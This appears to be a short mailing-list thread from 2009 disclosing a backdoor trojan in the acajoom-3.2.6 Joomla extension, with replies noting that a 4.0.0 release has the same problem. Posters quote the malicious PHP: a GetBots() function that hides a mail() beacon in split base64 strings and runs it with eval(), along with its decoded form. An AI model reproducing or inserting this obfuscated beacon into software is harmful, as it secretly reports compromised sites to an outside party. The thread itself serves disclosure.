Re: Re: Re: Re: Back door trojan in acajoom-3.2.6 for joomla

[anonymous]

==

@mail($us1, $us2, http://.$us2.$_SERVER['SCRIPT_NAME'].\n.$us3);

Re: Re: Re: Back door trojan in acajoom-3.2.6 for joomla

[elkekas]

not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
  list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
  'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
  eval(base64_decode($data2.$data1.$data3));
  }

Re: Re: Back door trojan in acajoom-3.2.6 for joomla

[chris . boergermann]

An early release of 4.0.0 has the same problem!



So Acajoom has a general security issue or the developers were stupid enough to 
develop with old code.

Re: Re: Back door trojan in acajoom-3.2.6 for joomla

[Jeffrey Walton]

 ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find 'Software Security' is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergerm...@wawerko.de chris.boergerm...@wawerko.de wrote:
 An early release of 4.0.0 has the same problem!

 So Acajoom has a general security issue or the developers
 were stupid enough to develop with old code.